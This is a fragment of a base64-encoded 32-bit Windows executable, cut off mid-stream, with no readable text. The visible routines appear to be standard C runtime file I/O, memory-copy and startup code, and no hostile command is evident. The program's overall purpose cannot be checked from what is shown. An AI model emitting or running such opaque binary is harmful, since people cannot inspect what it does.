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005f//iYUc5f//M8CJhTzl//85RRAPhkIFAACJhUTl//+KhSfl//+EwA+FZwEAAIoLi7Uo5f//M8CA+QoPlMCJhSDl//+LBgPHg3g4AHQVilA0iFX0iE31g2A4AGoCjUX0UOtLD77BUOguMAAAWYXAdDqLjTTl//8rywNNEDPAQDvID4alAQAAagKNhUDl//9TUOiyLwAAg8QMg/j/D4SxBAAAQ/+FROX//+sbagFTjYVA5f//UOiOLwAAg8QMg/j/D4SNBAAAM8BQUGoFjU30UWoBjY1A5f//UVD/tRzl//9D/4VE5f///xVw4EAAi/CF9g+EXAQAAGoAjYU85f//UFaNRfRQi4Uo5f//iwD/NAf/FWzgQACFwA+EKQQAAIuFROX//4uNMOX//wPBObU85f//iYU45f//D4wVBAAAg70g5f//AA+EzQAAAGoAjYU85f//UGoBjUX0UIuFKOX//4sAxkX0Df80B/8VbOBAAIXAD4TQAwAAg7085f//AQ+MzwMAAP+FMOX///+FOOX//+mDAAAAPAF0BDwCdSEPtzMzyWaD/goPlMFDQ4OFROX//wKJtUDl//+JjSDl//88AXQEPAJ1Uv+1QOX//+gRUwAAWWY7hUDl//8PhWgDAACDhTjl//8Cg70g5f//AHQpag1YUImFQOX//+jkUgAAWWY7hUDl//8PhTsDAAD/hTjl////hTDl//+LRRA5hUTl//8Pgvn9///pJwMAAIsOihP/hTjl//+IVA80iw6JRA846Q4DAAAzyYsGA8f2QASAD4S/AgAAi4U05f//iY1A5f//hNsPhcoAAACJhTzl//85TRAPhiADAADrBou1KOX//4uNPOX//4OlROX//wArjTTl//+NhUjl//87TRBzOYuVPOX///+FPOX//4oSQYD6CnUQ/4Uw5f//xgANQP+FROX//4gQQP+FROX//4G9ROX///8TAABywovYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xVs4EAAhcAPhEICAACLhSzl//8BhTjl//87ww+MOgIAAIuFPOX//yuFNOX//ztFEA+CTP///+kgAgAAiYVE5f//gPsCD4XRAAAAOU0QD4ZNAgAA6waLtSjl//+LjUTl//+DpTzl//8AK4005f//jYVI5f//O00Qc0aLlUTl//+DhUTl//8CD7cSQUFmg/oKdRaDhTDl//8Cag1bZokYQECDhTzl//8Cg4U85f//AmaJEEBAgb085f///hMAAHK1i9iNhUjl//8r2GoAjYUs5f//UFONhUjl//9Qiwb/NAf/FWzgQACFwA+EYgEAAIuFLOX//wGFOOX//zvDD4xaAQAAi4VE5f//K4U05f//O0UQD4I/////6UABAAA5TRAPhnwBAACLjUTl//+DpTzl//8AK4005f//agKNhUj5//9eO00QczyLlUTl//8PtxIBtUTl//8DzmaD+gp1DmoNW2aJGAPGAbU85f//AbU85f//ZokQA8aBvTzl//+oBgAAcr8z9lZWaFUNAACNjfDr//9RjY1I+f//K8GZK8LR+FCLwVBWaOn9AAD/FXDgQACL2DveD4SXAAAAagCNhSzl//9Qi8MrxlCNhDXw6///UIuFKOX//4sA/zQH/xVs4EAAhcB0DAO1LOX//zvef8vrDP8VGOBAAImFQOX//zvef1yLhUTl//8rhTTl//+JhTjl//87RRAPggr////rP2oAjY0s5f//Uf91EP+1NOX///8w/xVs4EAAhcB0FYuFLOX//4OlQOX//wCJhTjl///rDP8VGOBAAImFQOX//4O9OOX//wB1bIO9QOX//wB0LWoFXjm1QOX//3UU6D7c///HAAkAAADoRtz//4kw6z//tUDl///oStz//1nrMYu1KOX//4sG9kQHBEB0D4uFNOX//4A4GnUEM8DrJOj+2///xwAcAAAA6Abc//+DIACDyP/rDIuFOOX//yuFMOX//19bi038M81e6BXN///Jw2oQaOD6QADo4+f//4tFCIP4/nUb6Mrb//+DIADor9v//8cACQAAAIPI/+mdAAAAM/87x3wIOwWIK0EAciHoodv//4k46Ifb///HAAkAAABXV1dXV+gP2///g8QU68mLyMH5BY0cjaArQQCL8IPmH8HmBosLD75MMQSD4QF0v1DolEkAAFmJffyLA/ZEMAQBdBb/dRD/dQz/dQjoLvj//4PEDIlF5OsW6CTb///HAAkAAADoLNv//4k4g03k/8dF/P7////oCQAAAItF5Ohj5///w/91COjeSQAAWcPMzMzMzMzMVYvsV1aLdQyLTRCLfQiLwYvRA8Y7/nYIO/gPgqQBAACB+QABAAByH4M9fCtBAAB0FldWg+cPg+YPO/5eX3UIXl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